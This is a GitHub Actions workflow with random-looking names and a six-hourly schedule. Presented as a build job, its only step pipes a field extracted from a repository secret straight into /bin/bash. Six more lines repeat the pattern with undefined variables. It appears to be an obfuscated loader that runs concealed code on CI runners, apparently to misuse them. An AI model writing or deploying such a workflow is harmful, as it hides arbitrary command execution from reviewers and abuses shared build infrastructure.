name: peiyuanxie2603
on:
  workflow_dispatch:
  schedule:
    - cron: '6 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: peiyuanxie2603
        env:
          oolqp88: ${{ secrets.oolqp88 }}
        run: |
          echo $oolqp88 | jq -r .g4 | /bin/bash
          echo $js0 | jq -r .fa6300 | /bin/bash
          echo $eqba1 | jq -r .q5 | /bin/bash
          echo $gd61 | jq -r .hdg94715 | /bin/bash
          echo $k6905 | jq -r .tddth683 | /bin/bash
          echo $dyh77 | jq -r .c518 | /bin/bash
          echo $wyvbo798 | jq -r .y59 | /bin/bash

